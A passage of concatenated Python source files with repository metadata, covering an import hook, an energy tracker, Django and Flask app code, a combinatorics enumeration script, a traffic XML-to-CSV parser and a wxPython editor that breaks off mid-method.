| 2020-02-28T00:54:10.006487 | 2012-11-24T01:44:28 | 2012-11-24T01:44:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from __future__ import absolute_import
import sys
import imp
from ..api import API
class DynamicLoader(object):
    """PEP 302 import hook materializing ``apio.index.<api>`` packages.

    ``find_module`` claims dotted names under ``apio.index.``;
    ``load_module`` loads the API object lazily via ``API.load`` and exposes
    its ``actions`` sub-namespace.
    """

    def find_module(self, name, path=None):
        """Return self as loader for ``apio.index.<api>...``, else None."""
        # Bug fix: match the dotted prefix so unrelated packages such as
        # 'apio.indexer.x' are not hijacked by this finder.
        if not name.startswith('apio.index.'):
            return None
        # Only claim apio.index.<something> (three or more components);
        # 'apio' and 'apio.index' themselves are real packages.
        if len(name.split('.')) >= 3:
            return self
        return None

    def get_package(self, api_name):
        """Return the package for *api_name*, caching it in sys.modules."""
        package_name = "apio.index.%s" % api_name
        # Fetch the base package
        if package_name in sys.modules.keys():
            package = sys.modules[package_name]
        else:
            api = API.load(api_name)
            package = sys.modules.setdefault(package_name, api)
            package.__file__ = "<%s>" % package_name
            package.__loader__ = self
            package.__path__ = []
        return package

    def load_module(self, fullname):
        """Load ``apio.index.<api>[.actions[.<action>]]``."""
        names = fullname.split('.')
        api_name = names[2]
        package = self.get_package(api_name)
        # Do we need to go deeper?
        specifics = names[3:]
        if not specifics:
            return package
        # Only the 'actions' sub-namespace is importable. (A stray debug
        # 'print names' that ran before this raise has been removed.)
        if specifics[0] != 'actions':
            raise ImportError()
        # We just want actions
        if len(specifics) == 1:
            package.actions.__file__ = "<%s>" % fullname
            package.actions.__loader__ = self
            sys.modules.setdefault(fullname, package.actions)
            return package.actions
        elif len(specifics) == 2:
            return getattr(package.actions, specifics[1])
        else:
            raise ImportError()
# Register the import hook globally; the class name is deleted afterwards so
# only the installed instance remains reachable.
sys.meta_path.append(DynamicLoader())
del DynamicLoader
|
UTF-8
|
Python
| false | false | 2,012 |
1,056,561,982,669 |
405589cea7cea10dce4e20b0c67687f34efdea29
|
045858452656cbb95c0021fcedf43d4bfbd7013d
|
/energytrack/energytracker.py
|
b9c818094840e5f07f0dd6abd26661aa4cec2443
|
[
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-or-later",
"GPL-3.0-or-later",
"LGPL-2.0-or-later",
"GPL-3.0-only"
] |
non_permissive
|
thozza/energy-track
|
https://github.com/thozza/energy-track
|
5cb298c81cb27736ef8fab101795855190ffab34
|
90aca8ad7f9001d8cb8a13368cc1d3eceb63cc87
|
refs/heads/master
| 2020-01-22T10:56:49.857222 | 2014-08-24T12:44:44 | 2014-08-24T12:44:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
#
# -*- coding: utf-8 -*-
#
# energytracker.py
# Copyright 2013 Tomas Hozza <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Tomas Hozza <[email protected]>
from energytrack.energy import Energy
class EnergyTracker(object):
    """Registry of Energy objects, keyed by their unique names."""

    def __init__(self, name="New Tracker"):
        # Maps energy name -> Energy instance.
        self._energies = {}
        self._name = name

    def add_energy(self, energy=None):
        """Register *energy*; raises TypeError/ValueError on invalid input."""
        if energy is None:
            raise TypeError("Required argument 'energy' (pos 1) not found")
        elif not isinstance(energy, Energy):
            raise TypeError("Required argument 'energy' (pos 1) has to be of type Energy")
        elif self.energy_exists(energy.get_name()):
            raise ValueError("Energy with the given name already exists")
        self._energies[energy.get_name()] = energy

    def remove_energy(self, energy_name=None):
        """Remove and return the Energy registered under *energy_name*."""
        if energy_name is None:
            raise TypeError("Required argument 'energy_name' (pos 1) not found")
        elif not isinstance(energy_name, str):
            raise TypeError("Required argument 'energy_name' (pos 1) has to be String")
        elif energy_name not in self._energies:
            raise ValueError("Energy with the given name doesn't exist")
        return self._energies.pop(energy_name)

    def get_energy(self, energy_name=None):
        """Return the Energy registered under *energy_name*."""
        if energy_name is None:
            raise TypeError("Required argument 'energy_name' (pos 1) not found")
        elif not isinstance(energy_name, str):
            raise TypeError("Required argument 'energy_name' (pos 1) has to be String")
        elif energy_name not in self._energies:
            raise ValueError("Energy with the given name doesn't exist")
        return self._energies[energy_name]

    def energy_exists(self, energy=None):
        """Return True if an Energy named *energy* is registered."""
        if energy is None:
            raise TypeError("Required argument 'energy' (pos 1) not found")
        elif not isinstance(energy, str):
            # Typo fix in the message: "sting" -> "string".
            raise TypeError("Required argument 'energy' (pos 1) has to be string")
        return energy in self._energies

    def check_energy_rename(self, orig_name=None, new_name=None):
        """Validate a rename; raises on bad types, missing or duplicate names."""
        if orig_name is None:
            raise TypeError("Required argument 'orig_name' (pos 1) not found")
        elif not isinstance(orig_name, str):
            raise TypeError("Required argument 'orig_name' (pos 1) has to be string")
        if new_name is None:
            raise TypeError("Required argument 'new_name' (pos 2) not found")
        elif not isinstance(new_name, str):
            raise TypeError("Required argument 'new_name' (pos 2) has to be string")
        if orig_name not in self._energies:
            raise ValueError("Energy with name '" + orig_name + "' does not exist")
        if orig_name == new_name:
            return
        if new_name in self._energies:
            raise ValueError("Energy with name '" + new_name + "' already exists")

    def do_energy_rename(self, orig_name=None, new_name=None):
        """Rename an Energy, keeping its registry key consistent.

        Bug fix: the original removed and re-added the Energy without
        changing the object's name, so it was re-registered under the old
        key and the rename was a no-op.
        """
        self.check_energy_rename(orig_name, new_name)
        if orig_name == new_name:
            return
        energy = self.remove_energy(orig_name)
        # NOTE(review): assumes Energy exposes set_name() analogous to this
        # class -- confirm against energytrack.energy.Energy.
        energy.set_name(new_name)
        self.add_energy(energy)

    def get_energy_names_list(self):
        """Return the list of registered energy names."""
        return list(self._energies)

    def load_from_file(self, filename=None):
        raise NotImplementedError("Not implemented yet")

    def save_to_file(self, filename=None):
        raise NotImplementedError("Not implemented yet")

    def get_name(self):
        """Return the tracker's display name."""
        return self._name

    def set_name(self, name=""):
        """Set the tracker's display name."""
        self._name = name
|
UTF-8
|
Python
| false | false | 2,014 |
8,194,797,635,487 |
8a03496361f6d63eaaff8beaa23ec292ab1af3d2
|
dc897f8c81e85ab8f99cb635578c8750eb374729
|
/chapter5/JumpLoop.py
|
028e052ddb44b5c6da97bb3c13ef18c9748c8225
|
[] |
no_license
|
jianjian198710/PythonStudy
|
https://github.com/jianjian198710/PythonStudy
|
852c6a4dd5122d886b9bcf57756e7113133e74b7
|
f1042a0a4fb1ee10dd2536b268bd00ee26550614
|
refs/heads/master
| 2020-06-04T22:51:47.387955 | 2014-07-23T09:16:15 | 2014-07-23T09:16:15 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#5.5.5
#break
from math import sqrt

# Search downward from 99 to 82 for a perfect square; the for/else runs the
# else clause only when the loop completes without hitting 'break'.
for n in range(99,81,-1):
    root = sqrt(n)
    if root == int(root):
        print n
        break
else:
    print "Don't find it"

#while true
# Echo words until the user submits an empty line (Python 2 raw_input).
while True:
    word = raw_input("Enter a word: ")
    if not word: break
    print "The word is: "+word
|
UTF-8
|
Python
| false | false | 2,014 |
1,030,792,171,244 |
15dc8a1a9deef86a8ad776f11ea2be89db47c337
|
0af8fb4c81e629ab7d210a9a272190bc2c196365
|
/tree1.py
|
d1bd35583aa82f26d0083ecb947d17b6be8ed4f7
|
[] |
no_license
|
glwhart/enum4
|
https://github.com/glwhart/enum4
|
6fb466bdea5e75fdffd3a0fbc27f8f5223248374
|
c1f1ff5b304c99e3ba45ef4c6d2a2c4bcf202a74
|
refs/heads/master
| 2020-06-09T01:30:29.322925 | 2014-07-08T21:52:21 | 2014-07-08T21:52:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
# This version of the program tries to solve the "surjective enumeration" problem with the order of
# the loops reversed from what we first envisioned. The inner loop will be over colors (traversing
# up and down the "tree") the outer loop will be over configurations for each color.
import sys
def choose(n, k):
    """
    Binomial coefficient C(n, k), computed iteratively; returns 0 when k is
    outside [0, n].

    A fast way to calculate binomial coefficients by Andrew Dalke (contrib).
    (This probably isn't good for large values of n and k, but OK for our
    purposes --GH)
    """
    if k < 0 or k > n:
        return 0
    numerator = 1
    denominator = 1
    for t in range(1, min(k, n - k) + 1):
        numerator *= n
        denominator *= t
        n -= 1
    return numerator // denominator
def integer2coloring(y, m, a):
    """
    Take an integer and convert it into a binary coloring

    :param y: 0-based index of the coloring in the enumeration
    :param m: total number of slots
    :param a: number of slots colored '1'
    :returns: list of m entries, each 0 or 1
    """
    if m < a or y > choose(m,a): # Check that we didn't give nonsense input
        print "y=",y," m=",m," a=",a
        sys.exit("bad call to integer2coloring")
    # This follows the algorithm in the enum3 paper, Comp Mat Sci 59 101 (2010) exactly
    I = y       # remaining index to decode
    t = a       # '1' entries still to place
    ell = m     # slots still to fill
    configlist = [-1]*m
    #while any([i==-1 for i in configlist]):
    while ell > 0:
        # Place a 0 when skipping a '1' here does not overshoot the index,
        # otherwise place a 1 and consume one of the remaining '1's.
        if choose(ell-1,t-1) <= I:
            configlist[m-ell] = 0
            I -= choose(ell-1,t-1)
        else:
            configlist[m-ell] = 1
            t -= 1
        ell -= 1
    return configlist
def coloring2integer(coloring):
    """
    Take a coloring list and convert it into an integer

    Inverse of integer2coloring: returns the 0-based index of *coloring*
    within the enumeration of binary colorings with the same number of 1s.
    Note: the list is reversed in place and reversed back, so it is left
    unchanged on the normal path.
    """
    m = len(coloring)
    # Find the rightmost 1 in the list
    coloring.reverse()
    rm1 = m - coloring.index(1) # Finds the leftmost 1 (but we reversed the list)
    coloring.reverse() # Put the list back in the correct order
    z = coloring[:rm1].count(0) # Number of zeros with at least one "1" to their right
    x = 0
    templist = coloring
    for i in range(z): # Loop over the zeros with a 1 to their right
        p0 = templist.index(0) # Position of first zero in the temporary list
        n1r = templist[p0:].count(1) # Number of 1s to the right of leftmost zero
        templist = templist[p0+1:] # Throw away the leftmost zero
        x += choose(len(templist),n1r-1) # Compute the binomial coefficient for this "digit" of the number
    return x
### Test the routines for the case of 10 slots and 3 "red" (and 7 non-red)
colors = [4,2,2] # Number of each color in the list
n = sum(colors) # Number of entries in the list
k = len(colors) # Number of different colors
### Could we make some headway on the restricted site problem (at least for spectators) by using
### groups that skipped those sites (left them unchanged)?
# Construct the cyclic permutation group of order n
group = [range(n)]
for i in range(1,n):
    group.append([(j+i)%n for j in group[0]])
survivors = []
### Traverse a tree
# Compute the number of branches at each depth
c = [choose(sum(colors[ilc:]),colors[ilc]) for ilc in range(len(colors)-1)]
if len(c) != k-1: sys.exit("Something is wrong")
loc = [0]*(k-1)
iDepth = -1 # Top of the tree
iBranch = [-1]*(k-1) # Leftmost of the tree
nDepth = k - 1 # Total number of layers in the tree
ic = 0
#nNodes = reduce(lambda x,y:x*y, c)
#nNodes = reduce(lambda x,y:x*y, c[0])
#print nNodes, c
#sys.exit()
#print "# of nodes in tree: ", nNodes
# Depth-first walk over all (iDepth, iBranch) nodes: descend until the
# bottom layer, then advance the branch counter, backing up whenever a
# layer's branches are exhausted; terminate when we back up past the root.
while True:
    if iDepth < nDepth -1:
        iDepth += 1
        iBranch[iDepth] = 0
    else:
        iBranch[iDepth] += 1
        while iBranch[iDepth] > c[iDepth]-1: # If end of branches at this depth,
            iDepth -= 1 # go up until we can go down again
            iBranch[iDepth+1] = -1
            if iDepth < 0:
                break # All done with the tree
            iBranch[iDepth] += 1
    if iDepth < 0: break
    print ic, [iDepth, iBranch]
    ic = ic + 1
|
UTF-8
|
Python
| false | false | 2,014 |
8,280,696,993,218 |
d446cffc1f7bbc2f5937838882f8aa958ca83928
|
1ca18b8f7946ebbbccb6d0756994e7078e6a7d04
|
/guardian/management/__init__.py
|
03b7d8f47c07d2e201e0d571d70accfd4d81fd5b
|
[
"BSD-2-Clause"
] |
permissive
|
naro/django-guardian
|
https://github.com/naro/django-guardian
|
be60d242b80f499228338d76b7edea492e2b4c53
|
e8e2dd28d33f7662e4e94070aa47a665c9cdad0b
|
refs/heads/master
| 2021-01-20T19:19:11.847145 | 2012-08-24T16:27:47 | 2012-08-24T16:27:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.db.models import signals
from django.contrib.auth.models import User, Group
from guardian import models as guardian_app
from guardian.conf import settings as guardian_settings
def create_anonymous_user(sender, **kwargs):
    """Ensure the anonymous ``User`` row (pk from guardian settings) exists."""
    anon_pk = guardian_settings.ANONYMOUS_USER_ID
    try:
        User.objects.get(pk=anon_pk)
    except User.DoesNotExist:
        # Row is missing: create it with the well-known username.
        User.objects.create(pk=anon_pk,
            username='AnonymousUser')
def create_authenticated_virtual_group(sender, **kwargs):
    """Ensure the virtual ``Group`` representing all authenticated users exists."""
    group_pk = guardian_settings.AUTHENTICATED_VIRTUAL_GROUP_ID
    try:
        Group.objects.get(pk=group_pk)
    except Group.DoesNotExist:
        # Row is missing: create it with the configured display name.
        Group.objects.create(pk=group_pk,
            name=guardian_settings.AUTHENTICATED_VIRTUAL_GROUP_NAME)
# Run both bootstrap hooks after ``syncdb`` creates this app's tables; the
# dispatch_uid keeps each handler from being registered (and run) twice.
signals.post_syncdb.connect(create_anonymous_user, sender=guardian_app,
    dispatch_uid="guardian.management.create_anonymous_user")
signals.post_syncdb.connect(create_authenticated_virtual_group, sender=guardian_app,
    dispatch_uid="guardian.management.create_authenticated_virtual_group")
|
UTF-8
|
Python
| false | false | 2,012 |
858,993,471,264 |
e910010925c82490e8a155294982aa7a6bae6fd0
|
ca4fef8f87456f4357a7a16dddf820bd8d3a5958
|
/settings.py
|
4527e9bab74335f7f30114b87620d71201117647
|
[] |
no_license
|
hughdbrown/fivesongsdaily
|
https://github.com/hughdbrown/fivesongsdaily
|
6e976b154ac2ef4257f2d1dd5fff276d0063fbf3
|
6facc7e932ecfb1e256ed886930ae7d901274fab
|
refs/heads/master
| 2021-01-18T19:10:09.208807 | 2009-06-30T19:30:42 | 2009-06-30T19:30:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os.path, logging, sys

# Django settings for the fivesongs project.

# Site-specific values (PROJECT_ROOT, DB credentials, ...) come from
# local_settings.py; log a notice and fall back to defaults when absent.
try:
    from local_settings import *
except ImportError:
    try:
        from mod_python import apache
        apache.log_error( "local_settings.py not set; using default settings", apache.APLOG_NOTICE )
    except ImportError:
        import sys
        sys.stderr.write( "local_settings.py not set; using default settings\n" )

ADMINS = (
    ('', ''),
)
ADMIN_EMAIL = ''
MANAGERS = ADMINS

DEFAULT_FROM_EMAIL = ''
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''

# Fixed: tz database zone names use underscores -- 'America/Los Angeles'
# is not a valid identifier and breaks timezone-aware date handling.
TIME_ZONE = 'America/Los_Angeles'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False

import django
DJANGO_ROOT = django.__path__[0]

MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'site_media/')
MEDIA_URL = '/site_media/'
ADMIN_MEDIA_PREFIX = '/media/'

# NOTE(review): must be overridden with a unique, unpredictable value
# (normally via local_settings.py) before deployment.
SECRET_KEY = ''

TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.load_template_source',
    'django.template.loaders.app_directories.load_template_source',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
)
ROOT_URLCONF = 'fivesongsdaily.urls'
TEMPLATE_DIRS = (
    os.path.join(PROJECT_ROOT, 'templates/'),
    os.path.join(DJANGO_ROOT, 'contrib/admin/templates/')
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.admin',
    'django.contrib.comments',
    'fivesongsdaily.playlist',
    'fivesongsdaily.profiles',
    'fivesongsdaily.pages',
    'fivesongsdaily.contact',
    'fivesongsdaily.message',
    'fivesongsdaily.test',
)
|
UTF-8
|
Python
| false | false | 2,009 |
18,064,632,453,480 |
7fbde9074a4f894b04a9d87c472278110d6c41cf
|
43dd0a32d566ec9d715e041366af487fb3f6ba3b
|
/fflow.py
|
3b9196a8bd8844062d692ee3960fe2d95c16430b
|
[] |
no_license
|
haron/fflow.net
|
https://github.com/haron/fflow.net
|
7435d262527405ee9829d635508ea317bf045808
|
b5cab4c433b15c15ba5443f74d026f3b73176ca4
|
refs/heads/master
| 2020-06-05T13:07:20.531897 | 2013-06-17T22:56:40 | 2013-06-17T22:56:40 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import requests
from flask import Flask, request, render_template
from BeautifulSoup import BeautifulSoup
from PIL import Image
from StringIO import StringIO
app = Flask(__name__)
app.debug = True
log = app.logger

# Google AJAX feed-loader endpoint, used as a JSON proxy for arbitrary feeds.
FEED_PROXY = 'http://ajax.googleapis.com/ajax/services/feed/load'
MAX_ITEMS = 10
# Bounding box for generated thumbnails (consumed by tn_size()).
TN_WIDTH = 500
TN_HEIGHT = 170

# NOTE(review): these three patterns are defined but unused in this file.
slug_pattern = re.compile(r'[^\w\d\-/]+')
youtube_pat = re.compile(r'.*youtube.com/v/([\w\d_-]+).*')
vimeo_pat = re.compile(r'.*vimeo\.com/moogaloop\.swf\?clip_id=(\d+).*')
@app.route('/feed/')
def feed():
    """HTTP endpoint: fetch the feed named by ``?url=`` and render feed.xml."""
    feed_url = request.args.get('url', None)
    feed = process(feed_url)
    # (body, status, headers) tuple so the XML content type is explicit.
    return (render_template("feed.xml", **feed), 200, {"Content-Type": "text/xml; charset=utf-8"})
def fetch_json(url, params):
    """GET *url* with query *params* and decode the JSON response body."""
    response = requests.get(url, params=params)
    return response.json()
def process(url):
    """Load *url* through the Google feed-loader proxy and return the feed
    dict, augmented with an 'items' list of Item wrappers (one per entry)."""
    params = {
        'v': '1.0',
        'q': url,
        'num': MAX_ITEMS,
    }
    resp = requests.get(FEED_PROXY, params=params).json()
    feed = resp['responseData']['feed']
    feed['items'] = []
    for entry in feed['entries']:
        # Wrapping triggers Item.process(), which extracts a thumbnail.
        entry = Item(**entry)
        feed['items'].append(entry)
    return feed
class Item(object):
    """Wraps one feed entry; scans its HTML content for the first image of
    at least 50x50 pixels and records it (scaled by tn_size) as the
    entry's thumbnail."""

    thumbnail = None  # class-level default; overwritten per instance in process()

    def __init__(self, *args, **kwargs):
        # Entries without a guid fall back to their link as identifier.
        if not 'guid' in kwargs:
            kwargs['guid'] = kwargs['link']
        # Copy every feed field straight onto the instance.
        for k in kwargs:
            self.__dict__[k] = kwargs[k]
        self.process()

    def __str__(self):
        return '<Item: %s>' % self.link

    def process(self):
        """Find the first sufficiently large <img> and store its thumbnail dict."""
        log.info('Processing %s' % self)
        self.html = BeautifulSoup(self.content)
        media_tn = None  # NOTE(review): assigned but never used
        images = self.html.findAll('img')
        for i in images:
            log.debug(i)
            # Download each candidate image just to measure its dimensions.
            width, height = Image.open(StringIO(requests.get(i["src"]).content)).size
            if width >=50 and height >= 50:
                tn_width, tn_height = tn_size(width, height)
                self.thumbnail = {
                    "url": i["src"],
                    "get_url": i["src"],
                    "width": tn_width,
                    "height": tn_height
                }
                break
        return
def tn_size(width, height):
    """Scale (width, height) to fit the TN_WIDTH x TN_HEIGHT bounding box,
    preserving the aspect ratio; returns the new integer dimensions."""
    # Pick the axis that overflows the box more and scale to fit that axis.
    if float(width) / TN_WIDTH > float(height) / TN_HEIGHT:
        scale = float(TN_WIDTH) / width
    else:
        scale = float(TN_HEIGHT) / height
    return int(width * scale), int(height * scale)
def main():
    # Listen on all interfaces (Flask's default port, 5000).
    app.run(host="0.0.0.0")

if __name__ == '__main__':
    main()
|
UTF-8
|
Python
| false | false | 2,013 |
9,723,805,960,767 |
b9342c9309db0e611bc375d69273f9bc4c2020c0
|
09cffe0141419e9fadabda41b69c828181db4bca
|
/scratch/TF2_QML_parser_v3_tmconly.py
|
39c8cecf4d9dd0b44be2459733b0fcf1157fd1b8
|
[] |
no_license
|
rymcd/traffic-sim
|
https://github.com/rymcd/traffic-sim
|
992bc24401662fda4a397971310e4e1e95985093
|
5b6b985c3f1ce8fe1c985c939ed13889bd47cdcc
|
refs/heads/master
| 2018-12-28T18:02:36.744405 | 2014-05-25T18:43:28 | 2014-05-25T18:43:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import sys, os, subprocess
from xml.etree import ElementTree
import csv
from Tkinter import Tk
from tkFileDialog import askopenfilename
def parse_function(filepart):
    """Parse one <root>-wrapped <linear> XML fragment and append CSV rows to
    the module-global output file ``f2`` (Python 2 ``print >> f2``).

    One row is written per probe / probePath speed source under each point
    TMC's aggregation; when a TMC has aggregation data but no sources, a
    single aggregate-only row is written instead.
    """
    tree = ElementTree.fromstring(filepart)
    linear = tree.getiterator('linear')
    for eachlinear in linear:
        PARSED_DATE_GMT = eachlinear.get('timestamp')
        Linear_ID = eachlinear.get('id')  # NOTE(review): collected but unused
        pointTmc = eachlinear.getchildren()
        for each in pointTmc:
            countsources = 0
            dataTypescount = 0
            # Blank every output field so values cannot leak between TMCs.
            Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,jamFactor,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,providerId,pathStart,pathEnd, sourceID, percentTravelled, pathTT,fullpathSpeed, pathspeed,startLat,startLong,endLat,endLong = '','','','','','','','','','','','','','','','','','','','','','','','','','','','','','',''
            Point = each.get('pointTmcId')
            freeflowSpeed = each.get('freeflowSpeed')
            uncappedSpeed = each.get('uncappedSpeed')
            cappedSpeed = each.get('cappedSpeed')
            travelTimeConfidence = each.get('confidence')
            jamFactor = each.get('jamFactor')  # NOTE(review): never written to the CSV
            #dataType = each.getiterator('aggregation')
            dataType = each.getchildren()
            hires = 'N'  # NOTE(review): set but never used
            for each1 in dataType:
                #print each1.tag
                if each1.tag == 'aggregation':
                    #print 'dataType: ',each1, each1.tag
                    dataTypescount = dataTypescount + 1
                    SourceDataType = each1.get('type')
                    realtimePercent = each1.get('realtimePercent')
                    historicalPercent = each1.get('historicalPercent')
                    previousPercent = each1.get('previousPercent')
                    currentRealtimePercent = each1.get('currentRealtimePercent')
                    currentHistoricalPercent = each1.get('currentHistoricalPercent')
                    TMCAggTimestamp = each1.get('timestamp')
                    TMCAggTT = each1.get('travelTime')
                    speedSource = each1.getchildren()
                    for each2 in speedSource:
                        #print each2
                        if each2.tag == 'trafficPatterns':
                            NTP_StdDev = each2.get('stdDev')
                            NTP_Speed = each2.get('speed')
                        if each2.tag == 'previousAggregation':
                            PREV_realtimePercent = each2.get('realtimePercent')
                            PREV_historicalPercent = each2.get('historicalPercent')
                            PREV_previousPercent = each2.get('previousPercent')
                            PREV_currentRealtimePercent = each2.get('currentRealtimePercent')
                            PREV_currentHistoricalPercent = each2.get('currentHistoricalPercent')
                            PREV_TMCAggTimestamp = each2.get('timestamp')
                            PREV_TMCAggTT = each2.get('travelTime')
                        if each2.tag == 'probePath':
                            countsources = countsources + 1
                            providerId = each2.get('providerId')
                            pathStart = each2.get('pathStart')
                            pathEnd = each2.get('pathEnd')
                            sourceID = each2.get('sourceId')
                            percentTravelled = each2.get('percentTravelled')
                            pathTT = each2.get('travelTime')
                            fullpathSpeed = each2.get('pathSpeed')
                            pathSpeed = each2.get('ttaSpeed')
                            startLat = each2.get('startLat')
                            startLong = each2.get('startLong')
                            endLat = each2.get('endLat')
                            endLong = each2.get('endLong')
                            row_detail = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,each2.tag,providerId,pathStart,pathEnd, sourceID, percentTravelled, pathTT,fullpathSpeed, pathSpeed, startLat,startLong,endLat,endLong]
                            #print row_detail
                            # Element.get() yields None for missing attributes;
                            # blank them so the CSV row stays well-formed.
                            row_detail = [x if x else '' for x in row_detail]
                            print >> f2, ",".join(row_detail)
                        if each2.tag == 'probe':
                            countsources = countsources + 1
                            providerId = each2.get('providerId')
                            pathStart = each2.get('pathStart')
                            # NOTE(review): pathEnd reads 'pathStart' here --
                            # possibly intentional for point probes, but confirm.
                            pathEnd = each2.get('pathStart')
                            sourceID = each2.get('sourceId')
                            percentTravelled = each2.get('percentTravelled')
                            pathTT = each2.get('travelTime')
                            fullpathSpeed = each2.get('speed')
                            pathSpeed = each2.get('ttaSpeed')
                            startLat = each2.get('lat')
                            startLong = each2.get('long')
                            endLat = ''
                            endLong = ''
                            row_detail = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,each2.tag,providerId,pathStart,pathEnd, sourceID, percentTravelled, pathTT,fullpathSpeed, pathSpeed, startLat,startLong,endLat,endLong]
                            #print row_detail
                            row_detail = [x if x else '' for x in row_detail]
                            print >> f2, ",".join(row_detail)
            ##row_basic = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,'','','','','','','','','','','','','','','','','','','','','','','']
            # Aggregation present but no per-source children: emit one
            # aggregate-only row for this TMC.
            if countsources == 0 and dataTypescount > 0:
                row_tmcagg = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,'','','','','','','','','','','','','']
                print >> f2, ",".join(row_tmcagg)
            ##if countsources == 0 and dataTypescount == 0:
                ##print >> f2, ",".join(row_basic)
currentdir = os.getcwd()

# Hide the Tk root window; only the file-picker dialog is wanted.
Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
filename = askopenfilename(title='Select the input QML file') # show an "Open" dialog box and return the path to the selected file
output_filename = (filename.rpartition('/')[2]).rpartition('.')[0]
# NOTE(review): '\\' path separator assumes Windows output paths.
f2 = open(str(currentdir+'\\output_'+output_filename+'_TMConly.csv'),'w+')
tree_string = '<root>'
x = 0
printvar = 0
# CSV header row matching the fields emitted by parse_function().
print >> f2, 'PARSED_DATE_GMT,TMC,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,dataType,providerId,pathStart,pathEnd,sourceID,percentTravelled,pathTT,fullpathSpeed,pathSpeed,startLat,startLong,endLat,endLong'

# Stream the (potentially huge) QML file line by line, accumulating one
# <linear>...</linear> element at a time and parsing it when it closes --
# avoids loading the whole document into memory.
with open(str(filename)) as fileobject:
    printvar = 0
    for line in fileobject:
        if line[:14] == '<?xml version=':
            line = line.rpartition('<linears>')[2]
        if line[:7] == '<linear':
            tree_string = '<root>'
            printvar = 1
        if printvar == 0:
            continue
        if printvar == 1:
            tree_string = tree_string + line
        if (line == '</linear>\n' or line == '</linear>') and printvar == 1:
            printvar = 0
            tree_string = tree_string + '</root>'
            #print tree_string
            parse_function(tree_string)
            x = x + 1
            if x % 100000 == 0:
                print str(x) + ' linears processed'
f2.close()
print 'Output created at : ' + str(currentdir+'\\output_'+output_filename+'_TMConly.csv')
print 'Total linears parsed: ', str(x)
|
UTF-8
|
Python
| false | false | 2,014 |
3,693,671,890,664 |
730af1c0c02cbb17d423e1aa6ec526b8986b1841
|
6f8f186a8eb4bfb42f98d3bc910817f817598eeb
|
/Garble/WxGuiTest.py
|
da702178feb6c904a485272451c8683e854f5484
|
[] |
no_license
|
Feni/GarbleNotes
|
https://github.com/Feni/GarbleNotes
|
5100cee273787bad3ce9a1d66fde813b43c8e7fe
|
e891b57f7cf8e2b325e68d098b26c0dd6951975b
|
refs/heads/master
| 2016-09-05T18:24:56.828664 | 2012-11-08T05:06:57 | 2012-11-08T05:06:57 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import wx
class MyFrame(wx.Frame):
    """Minimal editor window: one multi-line text control; the note text is
    printed to stdout when the window closes (Python 2 ``print``)."""
    def __init__(self):
        wx.Frame.__init__(self, None, title="Garble", size=(500,150))
        self.textfield = wx.TextCtrl(self, style=wx.TE_MULTILINE)
        self.Bind(wx.EVT_CLOSE, self.OnExit) # Allows us to autosave on close.
        self.Show(True)
    def OnExit(self,event):
        # Close handler: dump the buffer, then actually destroy the frame
        # (required because binding EVT_CLOSE suppresses the default close).
